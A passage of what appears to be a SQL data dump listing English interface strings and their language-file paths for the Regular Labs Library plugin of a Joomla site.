Browsers','/home/smthsmth/public_html/plugins/system/regularlabs/language/en-GB/en-GB.plg_system_regularlabs.ini'),(5007,'RL_MOD','Module','/home/smthsmth/public_html/plugins/system/regularlabs/language/en-GB/en-GB.plg_system_regularlabs.ini'),(5008,'RL_MONTHS','Months','/home/smthsmth/public_html/plugins/system/regularlabs/language/en-GB/en-GB.plg_system_regularlabs.ini'),(5009,'RL_MONTHS_DESC','Select months to assign to.','/home/smthsmth/public_html/plugins/system/regularlabs/language/en-GB/en-GB.plg_system_regularlabs.ini'),(5010,'RL_MORE_INFO','More info','/home/smthsmth/public_html/plugins/system/regularlabs/language/en-GB/en-GB.plg_system_regularlabs.ini'),(5011,'RL_N_ITEMS_ARCHIVED','%d items successfully archived','/home/smthsmth/public_html/plugins/system/regularlabs/language/en-GB/en-GB.plg_system_regularlabs.ini'),(5012,'RL_N_ITEMS_ARCHIVED_1','Item successfully archived','/home/smthsmth/public_html/plugins/system/regularlabs/language/en-GB/en-GB.plg_system_regularlabs.ini'),(5013,'RL_N_ITEMS_DELETED','%d items successfully deleted','/home/smthsmth/public_html/plugins/system/regularlabs/language/en-GB/en-GB.plg_system_regularlabs.ini'),(5014,'RL_N_ITEMS_DELETED_1','Item successfully deleted','/home/smthsmth/public_html/plugins/system/regularlabs/language/en-GB/en-GB.plg_system_regularlabs.ini'),(5015,'RL_N_ITEMS_PUBLISHED','%d items successfully enabled','/home/smthsmth/public_html/plugins/system/regularlabs/language/en-GB/en-GB.plg_system_regularlabs.ini'),(5016,'RL_N_ITEMS_PUBLISHED_1','Item successfully enabled','/home/smthsmth/public_html/plugins/system/regularlabs/language/en-GB/en-GB.plg_system_regularlabs.ini'),(5017,'RL_N_ITEMS_TRASHED','%d items successfully trashed','/home/smthsmth/public_html/plugins/system/regularlabs/language/en-GB/en-GB.plg_system_regularlabs.ini'),(5018,'RL_N_ITEMS_TRASHED_1','Item successfully trashed','/home/smthsmth/public_html/plugins/system/regularlabs/language/en-GB/en-GB.plg_system_regularlabs.ini'),(5019,'RL_N_ITEMS_UNPUBLISHED','%d items successfully disabled','/home/smthsmth/public_html/plugins/system/regularlabs/language/en-GB/en-GB.plg_system_regularlabs.ini'),(5020,'RL_N_ITEMS_UNPUBLISHED_1','Item successfully disabled','/home/smthsmth/public_html/plugins/system/regularlabs/language/en-GB/en-GB.plg_system_regularlabs.ini'),(5021,'RL_N_LINKS_UPDATED','%d items updated.','/home/smthsmth/public_html/plugins/system/regularlabs/language/en-GB/en-GB.plg_system_regularlabs.ini'),(5022,'RL_N_LINKS_UPDATED_1','One item has been updated','/home/smthsmth/public_html/plugins/system/regularlabs/language/en-GB/en-GB.plg_system_regularlabs.ini'),(5023,'RL_NEW_CATEGORY','Create New Category','/home/smthsmth/public_html/plugins/system/regularlabs/language/en-GB/en-GB.plg_system_regularlabs.ini'),(5024,'RL_NEW_CATEGORY_ENTER','Enter a new category name','/home/smthsmth/public_html/plugins/system/regularlabs/language/en-GB/en-GB.plg_system_regularlabs.ini'),(5025,'RL_NEW_VERSION_AVAILABLE','A new version is available','/home/smthsmth/public_html/plugins/system/regularlabs/language/en-GB/en-GB.plg_system_regularlabs.ini'),(5026,'RL_NEW_VERSION_OF_AVAILABLE','A new version of %s is available','/home/smthsmth/public_html/plugins/system/regularlabs/language/en-GB/en-GB.plg_system_regularlabs.ini'),(5027,'RL_NO_ICON','No icon','/home/smthsmth/public_html/plugins/system/regularlabs/language/en-GB/en-GB.plg_system_regularlabs.ini'),(5028,'RL_NO_ITEMS_FOUND','No items found.','/home/smthsmth/public_html/plugins/system/regularlabs/language/en-GB/en-GB.plg_system_regularlabs.ini'),(5029,'RL_NORMAL','Normal','/home/smthsmth/public_html/plugins/system/regularlabs/language/en-GB/en-GB.plg_system_regularlabs.ini'),(5030,'RL_NORTHERN','Northern','/home/smthsmth/public_html/plugins/system/regularlabs/language/en-GB/en-GB.plg_system_regularlabs.ini'),(5031,'RL_NOT','Not','/home/smthsmth/public_html/plugins/system/regularlabs/language/en-GB/en-GB.plg_system_regularlabs.ini'),(5032,'RL_ONLY','Only','/home/smthsmth/public_html/plugins/system/regularlabs/language/en-GB/en-GB.plg_system_regularlabs.ini'),(5033,'RL_ONLY_AVAILABLE_IN_JOOMLA','Only available in Joomla %s or higher.','/home/smthsmth/public_html/plugins/system/regularlabs/language/en-GB/en-GB.plg_system_regularlabs.ini'),(5034,'RL_ONLY_AVAILABLE_IN_PRO','<em>Only available in PRO version!</em>','/home/smthsmth/public_html/plugins/system/regularlabs/language/en-GB/en-GB.plg_system_regularlabs.ini'),(5035,'RL_ONLY_AVAILABLE_IN_PRO_LIST_OPTION','(Only available in PRO version)','/home/smthsmth/public_html/plugins/system/regularlabs/language/en-GB/en-GB.plg_system_regularlabs.ini'),(5036,'RL_ONLY_VISIBLE_TO_ADMIN','This message will only be displayed to (Super) Administrators.','/home/smthsmth/public_html/plugins/system/regularlabs/language/en-GB/en-GB.plg_system_regularlabs.ini'),(5037,'RL_OPTION_SELECT','- Select -','/home/smthsmth/public_html/plugins/system/regularlabs/language/en-GB/en-GB.plg_system_regularlabs.ini'),(5038,'RL_OPTION_SELECT_CLIENT','- Select Client -','/home/smthsmth/public_html/plugins/system/regularlabs/language/en-GB/en-GB.plg_system_regularlabs.ini'),(5039,'RL_OS','Operating Systems','/home/smthsmth/public_html/plugins/system/regularlabs/language/en-GB/en-GB.plg_system_regularlabs.ini'),(5040,'RL_OS_DESC','Select the operating systems to assign to. Keep in mind that operating system detection is not always 100% accurate. Users can setup their browser to mimic other operating systems.','/home/smthsmth/public_html/plugins/system/regularlabs/language/en-GB/en-GB.plg_system_regularlabs.ini'),(5041,'RL_OTHER_AREAS','Other Areas','/home/smthsmth/public_html/plugins/system/regularlabs/language/en-GB/en-GB.plg_system_regularlabs.ini'),(5042,'RL_OTHER_OPTIONS','Other Options','/home/smthsmth/public_html/plugins/system/regularlabs/language/en-GB/en-GB.plg_system_regularlabs.ini'),(5043,'RL_OTHER_SETTINGS','Other Settings','/home/smthsmth/public_html/plugins/system/regularlabs/language/en-GB/en-GB.plg_system_regularlabs.ini'),(5044,'RL_OTHERS','Others','/home/smthsmth/public_html/plugins/system/regularlabs/language/en-GB/en-GB.plg_system_regularlabs.ini'),(5045,'RL_PAGE_TYPES','Page types','/home/smthsmth/public_html/plugins/system/regularlabs/language/en-GB/en-GB.plg_system_regularlabs.ini'),(5046,'RL_PAGE_TYPES_DESC','Select on what page types the assignment should be active.','/home/smthsmth/public_html/plugins/system/regularlabs/language/en-GB/en-GB.plg_system_regularlabs.ini'),(5047,'RL_PHP','Custom PHP','/home/smthsmth/public_html/plugins/system/regularlabs/language/en-GB/en-GB.plg_system_regularlabs.ini'),(5048,'RL_PHP_DESC','Enter a piece of PHP code to evaluate. The code must return the value true or false.<br><br>For instance:<br><br>return ( $user->name == \'Peter van Westen\' );','/home/smthsmth/public_html/plugins/system/regularlabs/language/en-GB/en-GB.plg_system_regularlabs.ini'),(5049,'RL_PLACE_HTML_COMMENTS','Place HTML comments','/home/smthsmth/public_html/plugins/system/regularlabs/language/en-GB/en-GB.plg_system_regularlabs.ini'),(5050,'RL_PLACE_HTML_COMMENTS_DESC','By default HTML comments are placed around the output of this extension.<br><br>These comments can help you troubleshooting when you don\'t get the output you expect.<br><br>If you prefer to not have these comments in your HTML output, turn this option off.','/home/smthsmth/public_html/plugins/system/regularlabs/language/en-GB/en-GB.plg_system_regularlabs.ini'),(5051,'RL_PLG_EDITORS-XTD','Editor Button Plugin','/home/smthsmth/public_html/plugins/system/regularlabs/language/en-GB/en-GB.plg_system_regularlabs.ini'),(5052,'RL_PLG_FIELDS','Field Plugin','/home/smthsmth/public_html/plugins/system/regularlabs/language/en-GB/en-GB.plg_system_regularlabs.ini'),(5053,'RL_PLG_SYSTEM','System Plugin','/home/smthsmth/public_html/plugins/system/regularlabs/language/en-GB/en-GB.plg_system_regularlabs.ini'),(5054,'RL_POSTALCODES','Postal Codes','/home/smthsmth/public_html/plugins/system/regularlabs/language/en-GB/en-GB.plg_system_regularlabs.ini'),(5055,'RL_POSTALCODES_DESC','A comma separated list of postal codes (12345) or postal code ranges (12300-12500).<br>This can only be used for [[%1:start link%]]a limited number of countries and IP addresses[[%2:end link%]].','/home/smthsmth/public_html/plugins/system/regularlabs/language/en-GB/en-GB.plg_system_regularlabs.ini'),(5056,'RL_POWERED_BY','Powered by %s','/home/smthsmth/public_html/plugins/system/regularlabs/language/en-GB/en-GB.plg_system_regularlabs.ini'),(5057,'RL_PRODUCTS','Products','/home/smthsmth/public_html/plugins/system/regularlabs/language/en-GB/en-GB.plg_system_regularlabs.ini'),(5058,'RL_PUBLISHED_DESC','You can use this to (temporarily) disable this item.','/home/smthsmth/public_html/plugins/system/regularlabs/language/en-GB/en-GB.plg_system_regularlabs.ini'),(5059,'RL_PUBLISHING_ASSIGNMENTS','Publishing Assignments','/home/smthsmth/public_html/plugins/system/regularlabs/language/en-GB/en-GB.plg_system_regularlabs.ini'),(5060,'RL_PUBLISHING_SETTINGS','Publish items','/home/smthsmth/public_html/plugins/system/regularlabs/language/en-GB/en-GB.plg_system_regularlabs.ini'),(5061,'RL_RANDOM','Random','/home/smthsmth/public_html/plugins/system/regularlabs/language/en-GB/en-GB.plg_system_regularlabs.ini'),(5062,'RL_REDSHOP','RedShop','/home/smthsmth/public_html/plugins/system/regularlabs/language/en-GB/en-GB.plg_system_regularlabs.ini'),(5063,'RL_REGIONS','Regions / States','/home/smthsmth/public_html/plugins/system/regularlabs/language/en-GB/en-GB.plg_system_regularlabs.ini'),(5064,'RL_REGIONS_DESC','Select the regions / states to assign to.','/home/smthsmth/public_html/plugins/system/regularlabs/language/en-GB/en-GB.plg_system_regularlabs.ini'),(5065,'RL_REGULAR_EXPRESSIONS','Use Regular Expressions','/home/smthsmth/public_html/plugins/system/regularlabs/language/en-GB/en-GB.plg_system_regularlabs.ini'),(5066,'RL_REGULAR_EXPRESSIONS_DESC','Select to treat the value as regular expressions.','/home/smthsmth/public_html/plugins/system/regularlabs/language/en-GB/en-GB.plg_system_regularlabs.ini'),(5067,'RL_REMOVE_IN_DISABLED_COMPONENTS','Remove in Disabled Components','/home/smthsmth/public_html/plugins/system/regularlabs/language/en-GB/en-GB.plg_system_regularlabs.ini'),(5068,'RL_REMOVE_IN_DISABLED_COMPONENTS_DESC','If selected, the plugin syntax will get removed from the component. If not, the original plugins syntax will remain in tact.','/home/smthsmth/public_html/plugins/system/regularlabs/language/en-GB/en-GB.plg_system_regularlabs.ini'),(5069,'RL_RTL','Right-to-Left','/home/smthsmth/public_html/plugins/system/regularlabs/language/en-GB/en-GB.plg_system_regularlabs.ini'),(5070,'RL_SAVE_CONFIG','After saving the Options it will not pop up on page load anymore.','/home/smthsmth/public_html/plugins/system/regularlabs/language/en-GB/en-GB.plg_system_regularlabs.ini'),(5071,'RL_SEASONS','Seasons','/home/smthsmth/public_html/plugins/system/regularlabs/language/en-GB/en-GB.plg_system_regularlabs.ini'),(5072,'RL_SEASONS_DESC','Select seasons to assign to.','/home/smthsmth/public_html/plugins/system/regularlabs/language/en-GB/en-GB.plg_system_regularlabs.ini'),(5073,'RL_SELECT','Select','/home/smthsmth/public_html/plugins/system/regularlabs/language/en-GB/en-GB.plg_system_regularlabs.ini'),(5074,'RL_SELECT_A_CATEGORY','Select a Category','/home/smthsmth/public_html/plugins/system/regularlabs/language/en-GB/en-GB.plg_system_regularlabs.ini'),(5075,'RL_SELECT_ALL','Select all','/home/smthsmth/public_html/plugins/system/regularlabs/language/en-GB/en-GB.plg_system_regularlabs.ini'),(5076,'RL_SELECT_AN_ARTICLE','Select an Article','/home/smthsmth/public_html/plugins/system/regularlabs/language/en-GB/en-GB.plg_system_regularlabs.ini'),(5077,'RL_SELECTED','Selected','/home/smthsmth/public_html/plugins/system/regularlabs/language/en-GB/en-GB.plg_system_regularlabs.ini'),(5078,'RL_SELECTION','Selection','/home/smthsmth/public_html/plugins/system/regularlabs/language/en-GB/en-GB.plg_system_regularlabs.ini'),(5079,'RL_SELECTION_DESC','Select whether to include or exclude the selection for the assignment.<br><br><strong>Include</strong><br>Publish only on selection.<br><br><strong>Exclude</strong><br>Publish everywhere except on selection.','/home/smthsmth/public_html/plugins/system/regularlabs/language/en-GB/en-GB.plg_system_regularlabs.ini'),(5080,'RL_SETTINGS_ADMIN_MODULE','Administrator Module Options','/home/smthsmth/public_html/plugins/system/regularlabs/language/en-GB/en-GB.plg_system_regularlabs.ini'),(5081,'RL_SETTINGS_EDITOR_BUTTON','Editor Button Options','/home/smthsmth/public_html/plugins/system/regularlabs/language/en-GB/en-GB.plg_system_regularlabs.ini'),(5082,'RL_SETTINGS_SECURITY','Security Options','/home/smthsmth/public_html/plugins/system/regularlabs/language/en-GB/en-GB.plg_system_regularlabs.ini'),(5083,'RL_SHOW_ASSIGNMENTS','Show Assignments','/home/smthsmth/public_html/plugins/system/regularlabs/language/en-GB/en-GB.plg_system_regularlabs.ini'),(5084,'RL_SHOW_ASSIGNMENTS_DESC','Select whether to only show the selected assignments. You can use this to get a clean overview of the active assignments.','/home/smthsmth/public_html/plugins/system/regularlabs/language/en-GB/en-GB.plg_system_regularlabs.ini'),(5085,'RL_SHOW_ASSIGNMENTS_SELECTED_DESC','All not-selected assignment types are now hidden from view.','/home/smthsmth/public_html/plugins/system/regularlabs/language/en-GB/en-GB.plg_system_regularlabs.ini'),(5086,'RL_SHOW_COPYRIGHT','Show Copyright','/home/smthsmth/public_html/plugins/system/regularlabs/language/en-GB/en-GB.plg_system_regularlabs.ini'),(5087,'RL_SHOW_COPYRIGHT_DESC','If selected, extra copyright info will be displayed in the admin views. Regular Labs extensions never show copyright info or backlinks on the frontend.','/home/smthsmth/public_html/plugins/system/regularlabs/language/en-GB/en-GB.plg_system_regularlabs.ini'),(5088,'RL_SHOW_HELP_MENU','Show Help Menu Item','/home/smthsmth/public_html/plugins/system/regularlabs/language/en-GB/en-GB.plg_system_regularlabs.ini'),(5089,'RL_SHOW_HELP_MENU_DESC','Select to show a link to the Regular Labs website in the Administrator Help menu.','/home/smthsmth/public_html/plugins/system/regularlabs/language/en-GB/en-GB.plg_system_regularlabs.ini'),(5090,'RL_SHOW_ICON','Show Button Icon','/home/smthsmth/public_html/plugins/system/regularlabs/language/en-GB/en-GB.plg_system_regularlabs.ini'),(5091,'RL_SHOW_ICON_DESC','If selected, the icon will be displayed in the Editor Button.','/home/smthsmth/public_html/plugins/system/regularlabs/language/en-GB/en-GB.plg_system_regularlabs.ini'),(5092,'RL_SHOW_UPDATE_NOTIFICATION','Show Update Notification','/home/smthsmth/public_html/plugins/system/regularlabs/language/en-GB/en-GB.plg_system_regularlabs.ini'),(5093,'RL_SHOW_UPDATE_NOTIFICATION_DESC','If selected, an update notification will be shown in the main component view when there is a new version for this extension.','/home/smthsmth/public_html/plugins/system/regularlabs/language/en-GB/en-GB.plg_system_regularlabs.ini'),(5094,'RL_SIMPLE','Simple','/home/smthsmth/public_html/plugins/system/regularlabs/language/en-GB/en-GB.plg_system_regularlabs.ini'),(5095,'RL_SLIDES','Slides','/home/smthsmth/public_html/plugins/system/regularlabs/language/en-GB/en-GB.plg_system_regularlabs.ini'),(5096,'RL_SOUTHERN','Southern','/home/smthsmth/public_html/plugins/system/regularlabs/language/en-GB/en-GB.plg_system_regularlabs.ini'),(5097,'RL_SPRING','Spring','/home/smthsmth/public_html/plugins/system/regularlabs/language/en-GB/en-GB.plg_system_regularlabs.ini'),(5098,'RL_START','Start','/home/smthsmth/public_html/plugins/system/regularlabs/language/en-GB/en-GB.plg_system_regularlabs.ini'),(5099,'RL_START_PUBLISHING','Start Publishing','/home/smthsmth/public_html/plugins/system/regularlabs/language/en-GB/en-GB.plg_system_regularlabs.ini'),(5100,'RL_START_PUBLISHING_DESC','Enter the date to start publishing','/home/smthsmth/public_html/plugins/system/regularlabs/language/en-GB/en-GB.plg_system_regularlabs.ini'),(5101,'RL_STRIP_SURROUNDING_TAGS','Strip Surrounding Tags','/home/smthsmth/public_html/plugins/system/regularlabs/language/en-GB/en-GB.plg_system_regularlabs.ini'),(5102,'RL_STRIP_SURROUNDING_TAGS_DESC','Select to always remove html tags (div, p, span) surrounding the plugin tag. If switched off, the plugin will try to remove tags that break the html structure (like p inside p tags).','/home/smthsmth/public_html/plugins/system/regularlabs/language/en-GB/en-GB.plg_system_regularlabs.ini'),(5103,'RL_STYLING','Styling','/home/smthsmth/public_html/plugins/system/regularlabs/language/en-GB/en-GB.plg_system_regularlabs.ini'),(5104,'RL_SUMMER','Summer','/home/smthsmth/public_html/plugins/system/regularlabs/language/en-GB/en-GB.plg_system_regularlabs.ini'),(5105,'RL_TABLE_NOT_FOUND','Required %s database table not found!','/home/smthsmth/public_html/plugins/system/regularlabs/language/en-GB/en-GB.plg_system_regularlabs.ini'),(5106,'RL_TABS','Tabs','/home/smthsmth/public_html/plugins/system/regularlabs/language/en-GB/en-GB.plg_system_regularlabs.ini'),(5107,'RL_TAG_CHARACTERS','Tag Characters','/home/smthsmth/public_html/plugins/system/regularlabs/language/en-GB/en-GB.plg_system_regularlabs.ini'),(5108,'RL_TAG_CHARACTERS_DESC','The surrounding characters of the tag syntax.<br><br><strong>Note:</strong> If you change this, all existing tags will not work anymore.','/home/smthsmth/public_html/plugins/system/regularlabs/language/en-GB/en-GB.plg_system_regularlabs.ini'),(5109,'RL_TAG_SYNTAX','Tag Syntax','/home/smthsmth/public_html/plugins/system/regularlabs/language/en-GB/en-GB.plg_system_regularlabs.ini'),(5110,'RL_TAG_SYNTAX_DESC','The word to be used in the tags.<br><br><strong>Note:</strong> If you change this, all existing tags will not work anymore.','/home/smthsmth/public_html/plugins/system/regularlabs/language/en-GB/en-GB.plg_system_regularlabs.ini'),(5111,'RL_TAGS','Tags','/home/smthsmth/public_html/plugins/system/regularlabs/language/en-GB/en-GB.plg_system_regularlabs.ini'),(5112,'RL_TAGS_DESC','Enter the tags to assign to. Use commas to separate the tags.','/home/smthsmth/public_html/plugins/system/regularlabs/language/en-GB/en-GB.plg_system_regularlabs.ini'),(5113,'RL_TEMPLATES','Templates','/home/smthsmth/public_html/plugins/system/regularlabs/language/en-GB/en-GB.plg_system_regularlabs.ini'),(5114,'RL_TEMPLATES_DESC','Select the templates to assign to.','/home/smthsmth/public_html/plugins/system/regularlabs/language/en-GB/en-GB.plg_system_regularlabs.ini'),(5115,'RL_TEXT','Text','/home/smthsmth/public_html/plugins/system/regularlabs/language/en-GB/en-GB.plg_system_regularlabs.ini'),(5116,'RL_TEXT_HTML','Text (HTML)','/home/smthsmth/public_html/plugins/system/regularlabs/language/en-GB/en-GB.plg_system_regularlabs.ini'),(5117,'RL_TEXT_ONLY','Text only','/home/smthsmth/public_html/plugins/system/regularlabs/language/en-GB/en-GB.plg_system_regularlabs.ini'),(5118,'RL_THIS_EXTENSION_NEEDS_THE_MAIN_EXTENSION_TO_FUNCTION','This extension needs %s to function correctly!','/home/smthsmth/public_html/plugins/system/regularlabs/language/en-GB/en-GB.plg_system_regularlabs.ini'),(5119,'RL_TIME','Time','/home/smthsmth/public_html/plugins/system/regularlabs/language/en-GB/en-GB.plg_system_regularlabs.ini'),(5120,'RL_TIME_FINISH_PUBLISHING_DESC','Enter the time to end publishing.<br><br><strong>Format:</strong> 23:59','/home/smthsmth/public_html/plugins/system/regularlabs/language/en-GB/en-GB.plg_system_regularlabs.ini'),(5121,'RL_TIME_START_PUBLISHING_DESC','Enter the time to start publishing.<br><br><strong>Format:</strong> 23:59','/home/smthsmth/public_html/plugins/system/regularlabs/language/en-GB/en-GB.plg_system_regularlabs.ini'),(5122,'RL_TOGGLE','Toggle','/home/smthsmth/public_html/plugins/system/regularlabs/language/en-GB/en-GB.plg_system_regularlabs.ini'),(5123,'RL_TOOLTIP','Tooltip','/home/smthsmth/public_html/plugins/system/regularlabs/language/en-GB/en-GB.plg_system_regularlabs.ini'),(5124,'RL_TOP','Top','/home/smthsmth/public_html/plugins/system/regularlabs/language/en-GB/en-GB.plg_system_regularlabs.ini'),(5125,'RL_TOTAL','Total','/home/smthsmth/public_html/plugins/system/regularlabs/language/en-GB/en-GB.plg_system_regularlabs.ini'),(5126,'RL_TYPES','Types','/home/smthsmth/public_html/plugins/system/regularlabs/language/en-GB/en-GB.plg_system_regularlabs.ini'),(5127,'RL_TYPES_DESC','Select the types to assign to.','/home/smthsmth/public_html/plugins/system/regularlabs/language/en-GB/en-GB.plg_system_regularlabs.ini'),(5128,'RL_UNSELECT_ALL','Unselect All','/home/smthsmth/public_html/plugins/system/regularlabs/language/en-GB/en-GB.plg_system_regularlabs.ini'),(5129,'RL_UNSELECTED','Unselected','/home/smthsmth/public_html/plugins/system/regularlabs/language/en-GB/en-GB.plg_system_regularlabs.ini'),(5130,'RL_UPDATE_TO','Update to version %s','/home/smthsmth/public_html/plugins/system/regularlabs/language/en-GB/en-GB.plg_system_regularlabs.ini'),(5131,'RL_URL','URL','/home/smthsmth/public_html/plugins/system/regularlabs/language/en-GB/en-GB.plg_system_regularlabs.ini'),(5132,'RL_URL_PARTS','URL matches','/home/smthsmth/public_html/plugins/system/regularlabs/language/en-GB/en-GB.plg_system_regularlabs.ini'),(5133,'RL_URL_PARTS_DESC','Enter (part of) the URLs to match.<br>Use a new line for each different match.','/home/smthsmth/public_html/plugins/system/regularlabs/language/en-GB/en-GB.plg_system_regularlabs.ini'),(5134,'RL_URL_PARTS_REGEX','Url parts will be matched using regular expressions. <strong>So make sure the string uses valid regex syntax.</strong>','/home/smthsmth/public_html/plugins/system/regularlabs/language/en-GB/en-GB.plg_system_regularlabs.ini'),(5135,'RL_USE_CONTENT_ASSIGNMENTS','For category & article (item) assignments, see the above Joomla! Content section.','/home/smthsmth/public_html/plugins/system/regularlabs/language/en-GB/en-GB.plg_system_regularlabs.ini'),(5136,'RL_USE_CUSTOM_CODE','Use Custom Code','/home/smthsmth/public_html/plugins/system/regularlabs/language/en-GB/en-GB.plg_system_regularlabs.ini'),(5137,'RL_USE_CUSTOM_CODE_DESC','If selected, the Editor Button will insert the given custom code instead.','/home/smthsmth/public_html/plugins/system/regularlabs/language/en-GB/en-GB.plg_system_regularlabs.ini'),(5138,'RL_USE_SIMPLE_BUTTON','Use Simple Button','/home/smthsmth/public_html/plugins/system/regularlabs/language/en-GB/en-GB.plg_system_regularlabs.ini'),(5139,'RL_USE_SIMPLE_BUTTON_DESC','Select to use a simple insert button, that simply inserts some example syntax into the editor.','/home/smthsmth/public_html/plugins/system/regularlabs/language/en-GB/en-GB.plg_system_regularlabs.ini'),(5140,'RL_USER_GROUP_LEVELS','User Group Levels','/home/smthsmth/public_html/plugins/system/regularlabs/language/en-GB/en-GB.plg_system_regularlabs.ini'),(5141,'RL_USER_GROUPS','User Groups','/home/smthsmth/public_html/plugins/system/regularlabs/language/en-GB/en-GB.plg_system_regularlabs.ini'),(5142,'RL_USER_GROUPS_DESC','Select the user groups to assign to.','/home/smthsmth/public_html/plugins/system/regularlabs/language/en-GB/en-GB.plg_system_regularlabs.ini'),(5143,'RL_USER_IDS','User IDs','/home/smthsmth/public_html/plugins/system/regularlabs/language/en-GB/en-GB.plg_system_regularlabs.ini'),(5144,'RL_USER_IDS_DESC','Enter the user ids to assign to. Use commas to separate ids.','/home/smthsmth/public_html/plugins/system/regularlabs/language/en-GB/en-GB.plg_system_regularlabs.ini'),(5145,'RL_USERS','Users','/home/smthsmth/public_html/plugins/system/regularlabs/language/en-GB/en-GB.plg_system_regularlabs.ini'),(5146,'RL_UTF8','UTF-8','/home/smthsmth/public_html/plugins/system/regularlabs/language/en-GB/en-GB.plg_system_regularlabs.ini'),(5147,'RL_VIDEO','Video','/home/smthsmth/public_html/plugins/system/regularlabs/language/en-GB/en-GB.plg_system_regularlabs.ini'),(5148,'RL_VIEW','View','/home/smthsmth/public_html/plugins/system/regularlabs/language/en-GB/en-GB.plg_system_regularlabs.ini'),(5149,'RL_VIEW_DESC','Select what default view should be used when creating a new item.','/home/smthsmth/public_html/plugins/system/regularlabs/language/en-GB/en-GB.plg_system_regularlabs.ini'),(5150,'RL_VIRTUEMART','VirtueMart','/home/smthsmth/public_html/plugins/system/regularlabs/language/en-GB/en-GB.plg_system_regularlabs.ini'),(5151,'RL_WIDTH','Width','/home/smthsmth/public_html/plugins/system/regularlabs/language/en-GB/en-GB.plg_system_regularlabs.ini'),(5152,'RL_WINTER','Winter','/home/smthsmth/public_html/plugins/system/regularlabs/language/en-GB/en-GB.plg_system_regularlabs.ini'),(5153,'RL_ZOO','ZOO','/home/smthsmth/public_html/plugins/system/regularlabs/language/en-GB/en-GB.plg_system_regularlabs.ini'),(5154,'RL_ZOO_CATEGORIES','ZOO Categories','/home/smthsmth/public_html/plugins/system/regularlabs/language/en-GB/en-GB.plg_system_regularlabs.ini'),(5155,'ADD_TO_MENU','Add to Menu','/home/smthsmth/public_html/plugins/system/regularlabs/language/en-GB/en-GB.plg_system_regularlabs.ini'),(5156,'ADVANCED_MODULE_MANAGER','Advanced Module Manager','/home/smthsmth/public_html/plugins/system/regularlabs/language/en-GB/en-GB.plg_system_regularlabs.ini'),(5157,'ADVANCED_TEMPLATE_MANAGER','Advanced Template Manager','/home/smthsmth/public_html/plugins/system/regularlabs/language/en-GB/en-GB.plg_system_regularlabs.ini'),(5158,'ARTICLES_ANYWHERE','Articles Anywhere','/home/smthsmth/public_html/plugins/system/regularlabs/language/en-GB/en-GB.plg_system_regularlabs.ini'),(5159,'ARTICLES_FIELD','Articles Field','/home/smthsmth/public_html/plugins/system/regularlabs/language/en-GB/en-GB.plg_system_regularlabs.ini'),(5160,'BETTER_PREVIEW','Better Preview','/home/smthsmth/public_html/plugins/system/regularlabs/language/en-GB/en-GB.plg_system_regularlabs.ini'),(5161,'BETTER_TRASH','Better Trash','/home/smthsmth/public_html/plugins/system/regularlabs/language/en-GB/en-GB.plg_system_regularlabs.ini'),(5162,'CACHE_CLEANER','Cache Cleaner','/home/smthsmth/public_html/plugins/system/regularlabs/language/en-GB/en-GB.plg_system_regularlabs.ini'),(5163,'CDN_FOR_JOOMLA','CDN for Joomla!','/home/smthsmth/public_html/plugins/system/regularlabs/language/en-GB/en-GB.plg_system_regularlabs.ini'),(5164,'COMPONENTS_ANYWHERE','Components Anywhere','/home/smthsmth/public_html/plugins/system/regularlabs/language/en-GB/en-GB.plg_system_regularlabs.ini'),(5165,'CONDITIONAL_CONTENT','Conditional Content','/home/smthsmth/public_html/plugins/system/regularlabs/language/en-GB/en-GB.plg_system_regularlabs.ini'),(5166,'CONTENT_TEMPLATER','Content Templater','/home/smthsmth/public_html/plugins/system/regularlabs/language/en-GB/en-GB.plg_system_regularlabs.ini'),(5167,'DB_REPLACER','DB Replacer','/home/smthsmth/public_html/plugins/system/regularlabs/language/en-GB/en-GB.plg_system_regularlabs.ini'),(5168,'DUMMY_CONTENT','Dummy Content','/home/smthsmth/public_html/plugins/system/regularlabs/language/en-GB/en-GB.plg_system_regularlabs.ini'),(5169,'EMAIL_PROTECTOR','Email Protector','/home/smthsmth/public_html/plugins/system/regularlabs/language/en-GB/en-GB.plg_system_regularlabs.ini'),(5170,'REGULAR_LABS_EXTENSION_MANAGER','Regular Labs Extension Manager','/home/smthsmth/public_html/plugins/system/regularlabs/language/en-GB/en-GB.plg_system_regularlabs.ini'),(5171,'GEOIP','GeoIP','/home/smthsmth/public_html/plugins/system/regularlabs/language/en-GB/en-GB.plg_system_regularlabs.ini'),(5172,'IP_LOGIN','IP Login','/home/smthsmth/public_html/plugins/system/regularlabs/language/en-GB/en-GB.plg_system_regularlabs.ini'),(5173,'MODALS','Modals','/home/smthsmth/public_html/plugins/system/regularlabs/language/en-GB/en-GB.plg_system_regularlabs.ini'),(5174,'MODULES_ANYWHERE','Modules Anywhere','/home/smthsmth/public_html/plugins/system/regularlabs/language/en-GB/en-GB.plg_system_regularlabs.ini'),(5175,'QUICK_INDEX','Quick Index','/home/smthsmth/public_html/plugins/system/regularlabs/language/en-GB/en-GB.plg_system_regularlabs.ini'),(5176,'REREPLACER','ReReplacer','/home/smthsmth/public_html/plugins/system/regularlabs/language/en-GB/en-GB.plg_system_regularlabs.ini'),(5177,'SIMPLE_USER_NOTES','Simple User Notes','/home/smthsmth/public_html/plugins/system/regularlabs/language/en-GB/en-GB.plg_system_regularlabs.ini'),(5178,'SLIDERS','Sliders','/home/smthsmth/public_html/plugins/system/regularlabs/language/en-GB/en-GB.plg_system_regularlabs.ini'),(5179,'SNIPPETS','Snippets','/home/smthsmth/public_html/plugins/system/regularlabs/language/en-GB/en-GB.plg_system_regularlabs.ini'),(5180,'SOURCERER','Sourcerer','/home/smthsmth/public_html/plugins/system/regularlabs/language/en-GB/en-GB.plg_system_regularlabs.ini'),(5181,'TABS','Tabs','/home/smthsmth/public_html/plugins/system/regularlabs/language/en-GB/en-GB.plg_system_regularlabs.ini'),(5182,'TOOLTIPS','Tooltips','/home/smthsmth/public_html/plugins/system/regularlabs/language/en-GB/en-GB.plg_system_regularlabs.ini'),(5183,'WHAT_NOTHING','What? Nothing!','/home/smthsmth/public_html/plugins/system/regularlabs/language/en-GB/en-GB.plg_system_regularlabs.ini'),(5184,'PLG_SYSTEM_REGULARLABS','System - Regular Labs Library','/home/smthsmth/public_html/plugins/system/regularlabs/language/en-GB/en-GB.plg_system_regularlabs.sys.ini'),(5185,'PLG_SYSTEM_REGULARLABS_DESC','Regular Labs Library - used by Regular Labs extensions','/home/smthsmth/public_html/plugins/system/regularlabs/language/en-GB/en-GB.plg_system_regularlabs.sys.ini'),(5186,'REGULAR_LABS_LIBRARY','Regular Labs 